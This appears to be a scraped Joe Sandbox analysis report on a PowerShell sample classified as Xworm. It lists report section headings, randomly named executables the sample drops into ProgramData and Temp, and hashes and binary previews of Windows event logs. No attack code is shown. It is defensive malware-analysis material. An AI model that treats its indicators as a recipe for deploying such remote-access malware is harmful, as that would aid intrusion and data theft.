SHA-512:	ED8F5083B9F5DE3627F216B8050101EBA1BA678157C50AAF6E87D470AF5139B73461D1A71E40635EE0C286FD645C634FCB527E605764A366C49560DE10A89F76
Malicious:	false
Preview:	ElfChnk.....................................0..................................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..H............`..L.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.6062693426352572
Encrypted:	false
SSDEEP:	384:8uhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGn:8uZxGp9gz
MD5:	CF40724C146F1DB29AF269053F96613F
SHA1:	D6B8705B855CF5BA9AA55AFD5E1389799762A90F
SHA-256:	0A25F1F439AEA040E1944135E7C1117E8AFA5D828A7CA84B84EA747F2B7653ED
SHA-512:	7C66C64A0A36D1FF60741BCECB6FD1B62E28F5442B4EFB6DDB86DE5C76B7038231C97DEAE20545E890AE2B894381C89B1FC603F2B82E2674413AA8A3CEA8C29D
Malicious:	false
Preview:	ElfChnk.T...............T...................8...(.....o.....................................................................J.l.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................Y...................1................................a..................................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9025656515671123
Encrypted:	false
SSDEEP:	384:Dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVIHIocIQIMI:DoxJSW
MD5:	B41866E6B03C9E84686A5870DB56E269
SHA1:	AEAFABA8D75C242BDBDB85548B322BA526ADC33C
SHA-256:	94718178332B546F524C977E74919A3BFFD09EF228F30627D9F51A4217707833
SHA-512:	8F8A321D45864CE060970E9FE12195943978161638CD8A42EF8895229ACDDAB07363E52D06BBDA120374489454C5123ACB871F32ABAC2C3EBA1BA45CE359E1FF
Malicious:	false
Preview:	ElfChnk.....................................x'...(...t<I....................................................................%.Bh............................................=...........................................................................................................................f...............?...........................m...................M...F...................

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report script.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\SVrB5SO0.exe

C:\ProgramData\cZp98.exe

C:\ProgramData\j3owB.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\NwhPywLp.exe

Windows Analysis Report
script.ps1